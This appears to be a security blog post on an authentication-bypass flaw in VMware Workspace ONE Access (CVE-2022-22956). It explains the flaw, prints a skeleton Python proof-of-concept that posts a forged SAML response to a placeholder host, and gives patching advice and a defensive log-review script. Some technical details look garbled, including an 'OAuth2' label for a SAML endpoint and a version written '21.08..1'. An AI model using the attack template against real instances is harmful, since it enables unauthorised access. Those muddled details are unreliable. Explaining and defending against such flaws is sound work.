If you work with VMware Workspace ONE Access (formerly VMware Identity Manager), you've probably heard whispers about critical vulnerabilities that surfaced in 2022—specifically, CVE-2022-22955 and CVE-2022-22956. These aren’t just your run-of-the-mill bugs: they allow a malicious actor to bypass authentication mechanisms altogether, thanks to flaws in the OAuth2 ACS framework, and then execute any operation on the vulnerable instance.
This post breaks down what makes CVE-2022-22956 especially dangerous, how the exploit works, and what you or your organization must do to stay safe. Let’s dig in—with code snippets, plain language, and direct links to all the critical details.
What is VMware Workspace ONE Access?
Workspace ONE Access helps organizations control access to apps, VDI resources, and integrations—usually acting as a secure authentication gateway. But a vulnerability here affects the _core_ of your identity infrastructure.
How Bad Is It?
Put simply: An attacker can submit a specially-crafted HTTP request to skip login requirements on your Workspace ONE Access instance. Once past the gates, the attacker can potentially access, modify, or delete sensitive data.
Why Do These Vulnerabilities Exist?
Both CVE-2022-22955 and CVE-2022-22956 exist because certain endpoints in the OAuth2 ACS were unintentionally exposed. These endpoints accepted requests without fully verifying the user’s identity, enabling attackers to bypass key authentication controls.
Exploit Details: How the Attack Works
The attacks outlined in CVE-2022-22956 focus on abusing weak validation in the OAuth2 ‘/SAAS/login/acs/’ endpoint.
https:///SAAS/login/acs/
Exploit Example (POC Code)
Below is a Python example demonstrating how a bad actor might attempt to exploit this by sending a fake SAML response to Workspace ONE Access:
```python
import requests

# Placeholder host from the original post
target_url = "https://victim-VMware-Access/SAAS/login/acs/"
headers = {'Content-Type': 'application/x-www-form-urlencoded'}

# Placeholder: the post does not include an actual assertion
fake_saml_response = """
<BASE64-encoded malicious SAML assertion>
"""

payload = {
    'SAMLResponse': fake_saml_response
}

response = requests.post(target_url, data=payload, headers=headers, verify=False)
print('[*] HTTP Status:', response.status_code)
print('[*] Cookies:', response.cookies)

if 'JSESSIONID' in response.cookies:
    print('[*] Successfully bypassed authentication! Privileged session established.')
else:
    print('[!] Exploit failed.')
```
_Note:_
You’d need to generate or obtain a properly-crafted Base64 SAML assertion appropriate for the instance and users you’re targeting.
VMware Advisory:
NIST NVD Entry:
Horizon3.ai POC & Writeup:
How to Protect Yourself: Quick Remediation Steps
1. Patch Now.
VMware has released patches—update _immediately_. Running Workspace ONE Access 20.10, 21.08, or 21.08..1? Get the latest fix:
- VMware Patch Download
2. Disable External Access Temporarily.
Restrict internet access to Workspace ONE Access until you’re patched.
3. Review Logs.
Check your logs for suspicious requests to the /SAAS/login/acs/ endpoint, both before and after patching.
4. Rotate Credentials.
If you believe you were vulnerable, refresh all admin and service account credentials.
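One way to approach the log review in step 3, as an added example that is not part of the original post or any VMware tooling: it summarises requests to /SAAS/login/acs/ per source address, split at the time you patched, and lists sources outside the networks you expect. The "combined" access-log format, `TRUSTED_NETS`, `PATCHED_AT`, the function names and the sample lines are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network

# Assumption: "combined" access-log format; adapt LINE_RE to your appliance or proxy.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
ACS_PREFIX = "/SAAS/login/acs"             # endpoint named in the post
TRUSTED_NETS = [ip_network("10.0.0.0/8")]  # assumption: networks expected to log in
PATCHED_AT = datetime(2022, 4, 8, 12, 0, tzinfo=timezone.utc)  # constructed patch time

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '10.1.2.3 - - [05/Apr/2022:09:12:01 +0000] "POST /SAAS/login/acs/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.50 - - [07/Apr/2022:02:44:10 +0000] "POST /SAAS/login/acs/ HTTP/1.1" 200 512 "-" "python-requests/2.27.1"',
    '203.0.113.50 - - [09/Apr/2022:03:01:55 +0000] "POST /SAAS/login/acs/ HTTP/1.1" 403 0 "-" "python-requests/2.27.1"',
    '198.51.100.7 - - [07/Apr/2022:11:00:00 +0000] "GET /favicon.ico HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]


def is_trusted(ip):
    try:
        return any(ip_address(ip) in net for net in TRUSTED_NETS)
    except ValueError:  # hostname or garbage in the client field
        return False


def acs_hits(lines, patched_at=PATCHED_AT):
    """Per-source summary of requests to the ACS endpoint, split at patch time."""
    summary = defaultdict(lambda: {"before": 0, "after": 0, "statuses": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not m["path"].startswith(ACS_PREFIX):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entry = summary[m["ip"]]
        entry["before" if ts < patched_at else "after"] += 1
        entry["statuses"].add(int(m["status"]))
        entry["trusted"] = is_trusted(m["ip"])
    return dict(summary)


def needs_review(summary):
    """Sources outside the trusted networks that reached the endpoint."""
    return sorted(ip for ip, e in summary.items() if not e["trusted"])


if __name__ == "__main__":
    result = acs_hits(SAMPLE)
    for ip in needs_review(result):
        print(ip, result[ip])
```

A source listed by `needs_review` with hits in the "before" window is a candidate for the credential rotation in step 4; the status codes alone do not prove or rule out a bypass.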
Final Thoughts
CVE-2022-22956 isn’t a theoretical risk—it’s an open door, and malicious actors know this flaw can grant them free access to your company’s crown jewels. Make sure your VMware Workspace ONE Access instances are up to date and double-check your exposure. When an identity platform’s authentication can be bypassed, it becomes not just _your_ problem, but a catastrophe in the making.
References Recap
- VMware VMSA-2022-0011
- NIST CVE-2022-22956
- Horizon3.ai Attack Blog
Be exclusive—share this actionable info with your team so you don’t get caught off-guard by authentication bypass attacks like CVE-2022-22956.
Timeline
Published on: 04/13/2022 18:15:00 UTC
Last modified on: 04/21/2022 14:17:00 UTC